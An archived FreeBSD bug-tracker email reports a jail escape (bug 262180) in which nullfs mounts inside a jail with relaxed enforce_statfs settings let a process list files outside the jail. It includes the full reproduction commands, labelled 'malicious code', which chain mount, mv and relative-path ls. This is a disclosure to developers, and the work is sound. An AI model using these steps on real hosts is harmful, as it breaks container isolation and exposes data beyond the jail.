Date: Thu, 24 Feb 2022 23:43:32 +0000 From: bugzilla-noreply@freebsd.org To: bugs@FreeBSD.org Subject: [Bug 262180] jail escaping via jal-friendly nullfs Message-ID: <bug-262180-227@https.bugs.freebsd.org/bugzilla/>
next in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D262180 Bug ID: 262180 Summary: jail escaping via jal-friendly nullfs Product: Base System Version: 12.3-RELEASE Hardware: Any OS: Any Status: New Severity: Affects Some People Priority: --- Component: kern Assignee: bugs@FreeBSD.org Reporter: firk@cantconnect.ru Jail could be escaped when run with enforce_statfs<2, allow.mount=3Dtrue, allow.mount.nullfs=3Dtrue. prepare jail environment > mkdir /j/1 > tar -c -f - /bin/ lib /libexec /sbin | tar -x -f - -C /j/1 > mkdir /j/1/tmp start a vulnerable jail > jail -c path=3D/j/1 persist=3Dfalse allow.mount=3Dtrue allow.mount.nullfs= =3Dtrue enforce_statfs=3D1 command=3D/bin/sh malicious code > mkdir /tmp/a /tmp/a/b/c /tmp/a/b/c/test /tmp/a/d > mount -t nullfs /tmp/a/b/c /tmp/a/d > cd /tmp/a/d/test > mv /tmp/a/b/c/test /tmp/a/b/test > ls -al ../../../../.. > ls -al ../../../../../.. you will see the files outside the jail --=20 You are receiving this mail because: You are the assignee for the bug.=
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-262180-227>